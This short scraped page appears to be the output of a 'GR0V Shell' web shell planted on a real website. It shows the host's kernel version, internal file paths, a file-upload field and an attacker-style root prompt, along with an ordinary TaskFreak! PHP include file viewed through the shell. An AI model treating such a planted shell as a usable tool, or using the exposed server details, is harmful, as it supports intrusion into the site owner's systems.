? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/ittask/
File Upload :
Current File : /home/admin/public_html/old/ittask/_include.php

<?php
/****************************************************************************\
* TaskFreak!                                                                 *
* multi user                                                                 *
******************************************************************************
* Version: 0.6.3                                                             *
* Authors: Stan Ozier <taskfreak@gmail.com>                                  *
* License:  http://www.gnu.org/licenses/gpl.txt (GPL)                        *
\****************************************************************************/

if (@is_readable('./include/config.php')) {
    include './include/config.php';
} else if (@is_readable('../include/config.php')) {
    include '../include/config.php';
} else {
    header('Location: error.php?tznMessage='
        .urlencode('Could not find or access config.php file. Please edit _include.php file.'));
    exit;
}
?>

T1KUS90T
  root-grov@210.1.60.28:~$